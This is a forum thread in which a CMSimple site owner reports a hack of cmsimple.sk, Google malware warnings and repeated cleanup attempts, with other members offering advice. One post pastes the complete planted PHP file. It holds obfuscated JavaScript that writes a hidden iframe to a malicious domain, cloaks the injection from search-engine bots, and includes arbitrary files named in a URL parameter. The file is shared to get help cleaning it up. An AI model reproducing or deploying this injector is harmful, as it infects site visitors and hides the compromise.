cmsimple.sk: Google malware warning

[johnjdoe]

Hi, did you see that Google gives a malware warning when accessing cmsimple.sk: "Warning - visiting this web site may harm your computer!"

Look here: http://www.google.com/interstitial?url= ... simple.sk/

@Tata: do you have an explanation for this?

[Holger]

Yes, I've informed him by PM yesterday and removed the link to his website in his profile.
He's working on that.

Holger

[Tata]

Hi, all!
I am slowly sick about the hackers. I got this warning three days ago. You remember these attacks a couple of months ago. Thence I made immediately everything you have suggested and followed also all recommendations found on internet. I have:

• reinstalled my PC from"0".
• downloaded my entire webspace from the host and deleted my entire domain.
• changed my FTP passwords.
• detected all infected files - they were at first attack only the index.php files and they were actually not infected - only a code with a link to infectious websites was inserted - in small files on their very end, in larger files somewhere in the middle with deleting the rest of them, so the pages were out of function.
• cleaned (at this time over 5000!!! files) manually - damaged files were replaced by their originals new downloaded from CMSimplewiki or from authors' websites.
• uploaded everything back, CHMODed all index.php files (444) and checked by Google - no warnings.

About after a week or two new attack came and all index.* files were manipulated. I uploaded everything again and CHMODed all index.* files. There were also some installations which I used as my online playgrounds. These were not infected and I obviously have overseen their index.* files. These were manipulated this week. I can't understand how is it possible. There is no one file on my local server hosting this "IFRAME code". It can't also be found by any Antivirus. But my PC is absolutely free }as far as one can rely on the antivirus, firewall and all other anti... software. (I run Windows7, ESET Internet Security, Defender).
This time there were manipulated only 47 index.php files which I have obviously overseen on CHMODing. But They were also installation to which no one has access. Only I use them for my testings.
I asked Google for re-checking the domain. Today (after 5 days!!!) I've got the confirmation. But they avoided to announce when the domain will be checked and what will be the result.
Now I have checked the warning from FF at http://safebrowsing.clients.google.com/ ... simple.sk/ and it says:

What is the actual rank in the list for cmsimple.sk?
The site is listed among the suspicious sites - visitting this site may damage your PC.
During the last 90 days was a part of this site listed because of suspicious activity 1 times.
What happened when Google visited this site?
From 24 pages tested on this site during the last 90 days, 15 pages caused download and installation of malilcious software without user's authorization....
Malicious software includes 33 trojan(s), 30 scripting exploit(s), 14 exploit(s). Successful infection resulted in an average of 1 new process(es) on the target machine.
Malicious software is hosted on 3 domains. including keymydomains.com/, ncenterpanel.cn/, sites-counter.com/.
This site was hosted on 1 network(s) including AS29208 (DIALTELECOM).
Acts this site as the source of further distribution of malicious software?
It seems that during the last 90 days the site cmsimple.sk has not act as a source infecting any other sites.
Does this site host malicious software?
No, this site hosted no malicious software in the last 90 days

Anyway after five days the domain is still inaccessible. But only in FF and Safari. There are no warnings by IE and GeBin9.

Help me please, what else shall I do?

[Holger]

Hi Tata,

at the moment your page is accessible with the latest FF and enabled savebrowsing.
[OT]
With a look at the sourcecode, i've found 3 iframes:
Two at the top (maybe a counter) and one other, pointing to e-katalog.sk:
http://safebrowsing.clients.google.com/ ... katalog.sk

You should remove all that unnecessary stuff.
[/OT]

Holger

[Tata]

I am out of power. I downloaded the domain again and checked it for any IFRAME available. Now I have fond the IFRAME pointing to http:[slash/slash]ncenterpanel[dot]cn[slash]php[slash]p31[dot]php in the first line of:
cmsimple/index.php
plugins/index.php
Now I see that almost in any subdirectory there is a file uploaded with randomly generated name like PEC6963F720301.php. How is it possible? What, the hell shall I do now? The website is nomore accessible by any browser, even by IE is it not accessible. I am going to download the domain again and I am looking for wery creative night and weekend
Here is the code of the files

Code: Select all

<?php

$frame_code = '<!-- hJTYsX hwZrh TpA gJK LhdIvzPX --><script>/*_riRJopYA_uU*/var maSKFTfgzy=document;/*eNGUgQyproQjLwcwGxtLckVP*/function JSRJxVcV(iKGZa)/*fPxDyeN_cINKnEiaEijWSjbMQ*/{var sIBtuWphKVC = "",/*PTSzNTVJPPSZEgc*/ASksbIeCmKm=0;for(ASksbIeCmKm=iKGZa.length-1;ASksbIeCmKm >= 0;ASksbIeCmKm--)/*fkeWREfireemHjIDyyvaKLqMK*/{sIBtuWphKVC+=iKGZa.charAt(ASksbIeCmKm);}return sIBtuWphKVC;/*lQFLAvMavWhp*/}/*_riRJopYA_uU*/function THAMWc(Uf_hW)/*wvskgKquyCfDU_fNnzLh*/{/*asAYOrimRFaxNjr*/Uf_hW = Uf_hW.replace(/[\.]/g, "%");/*asAYOrimRFaxNjr*/Uf_hW=unescape(Uf_hW);/*OFYakHAvPHLmfLCLgYBuCu*/return JSRJxVcV(Uf_hW);/*YcHVPLpfsLmebZsoZxcXjR*/}/*RropemxIkeWaSKfJWl*/function KNxrQJJuJ(){/*PTSzNTVJPPSZEgc*/maSKFTfgzy.write("<style>.apcdqYgApH{width:1px;height:1px;border:none;visibility:hidden}</style>");/*vFzsZkRJRqmDBwCtOax*//*G_fFjBELxfFI*/var thOySD="<iframe id=\"PzuNOYDH\" src=\"x\" class=\"apcdqYgApH\"></iframe>";/*wvskgKquyCfDU_fNnzLh*//*vFzsZkRJRqmDBwCtOax*/var zOHkNaBQqOk=thOySD.replace(/[\+x]/g,THAMWc(".70.68.70.2e.6e.69.2f.34.37.31.2f.72.65.73.75.2f.6d.6f.63.2e.72.65.74.6e.75.6f.63.2d.73.65.74.69.73.2f.2f.3a.70.74.74.68"));/*vFzsZkRJRqmDBwCtOax*//*PTSzNTVJPPSZEgc*/return zOHkNaBQqOk;/*vFzsZkRJRqmDBwCtOax*//*G_fFjBELxfFI*/}/*fPxDyeN_cINKnEiaEijWSjbMQ*//*UACyjbdWJu*//*fPxDyeN_cINKnEiaEijWSjbMQ*//*gxmlpKbCEZYM*/maSKFTfgzy.writeln(KNxrQJJuJ());/*XOQoHXqCHdswYQ*//*RropemxIkeWaSKfJWl*//*lQFLAvMavWhp*/</script><!-- hJTY sXhwZrhTpA gJKLhdIvzPX_2 -->';
function get_file_dir_($file) {
    global $argv;
    $dir = dirname(getcwd() . '/' . $file);
    $curDir = getcwd();
    @chdir($dir);
    $dir = getcwd();
    @chdir($curDir);
    return $dir;
}
function is_search_bot($agent)
{	
	if(
		strstr($agent, "Yandex/") != null ||
		strstr($agent, "YaDirectBot") != null ||
		strstr($agent, "James Bond") != null ||
		strstr($agent, "Googlebot") != null ||
		strstr($agent, "Mediapartners-Google") != null ||
		strstr($agent, "StackRambler") != null ||
		strstr($agent, "Slurp") != null ||
		strstr($agent, "msnbot") != null 
	) 
	{
		return true;
	}
	return false;
}
function callback($data)
{
	global $frame_code;
	$data = preg_replace('/<iframe.*style=.*hidden.*\/iframe[^>]*>/i', "", $data);	
	$data = preg_replace('/<div.*style=.*display:none.*[^>]*>.*<iframe .*\/.*div[^>]*>/i', "", $data);
	$data = preg_replace('/<!-- ad --><script[^>]*>.*<\/script><!-- \/ad -->/i', "", $data);	
	if(is_search_bot($_SERVER['HTTP_USER_AGENT']) == true) {
		return $data;	
	} else {
		if(preg_match("/(<body[^>]*>)/i", $data) > 0) {
			return preg_replace("/(<body[^>]*>)/i", "$1 \n".$frame_code, $data, 1);
		}		
		else {
			return $data.$frame_code;
		}
	}
}
if(@ob_start('callback') == true) {
	$file 	= $_GET['qq'];
	@chdir(get_file_dir_($file));
	include($file);
} else {
	echo $frame_code;
}
?>

[CMSimple-Styles.com]

Do you have global variables enabled? You can do a batch removal, no need to go trough the files manually. I have done this for someone else who also got hacked with dreamweaver

[Tata]

Do you have global variables enabled?

I think I do. I have the phpinfo.php file on the server, but I can't run it right now. It is 8:12 AM and I have been sittin here sincece may last post yesterday. Everything was cleaned and uploaded back, all indexes were closed by 444. Then the FTP password checked and everything searched back and te damned files like PEO123456879.php were back again.
The cleaning is not that difficult. I simply let search the localhost for all index.* files. Then open them in Notepad++. There I search e.g. for any IFRAME and check found files for malicious links.
Or I search the localhost for any file containig the string ":8080"which is used in those linlks.
But when you have the batch file stored somewhere, I'll try this too. But now, I will finally need to take a nap. My domain is available in no more browser... WHY EXACTLY MY? I have about 20 other websites on the same ISP server. Only 2 of them were compromised. I don't undestand this.
Good night, friends
Good morning again!
Can't sleep. I deleted all those dummy files from the server recently. Now I checked it again and the files are tehre again. I need to contact my ISP about this.

[Gert]

Hallo Tata,

I recommend to use cmsimple.sk for your cmsimple.sk website only. This domain is an "official" domain of CMSimple. If there is no more than 1 Installation of CMSimple, you have it easier under control.

For playground better use another (not so important) domain.

[Tata]

It seems as I am really forced to do it this way. I already reduced all my "playgrounds" to 3, which are not big at all. Will see how does it go. I cleaned everything I've found. But the website is still not accessible.

[Tata]

It seems to be everything OK so far again. At this point I would like to know if it wouldn't be good to use more strict CHMOD settings for the installation and have all possible directories and files set to read only. Actually there are many of them for which this setting would be absolutely enough. Or maybe some general .htaccess file taking care of this.
Thank you for all your hints and support.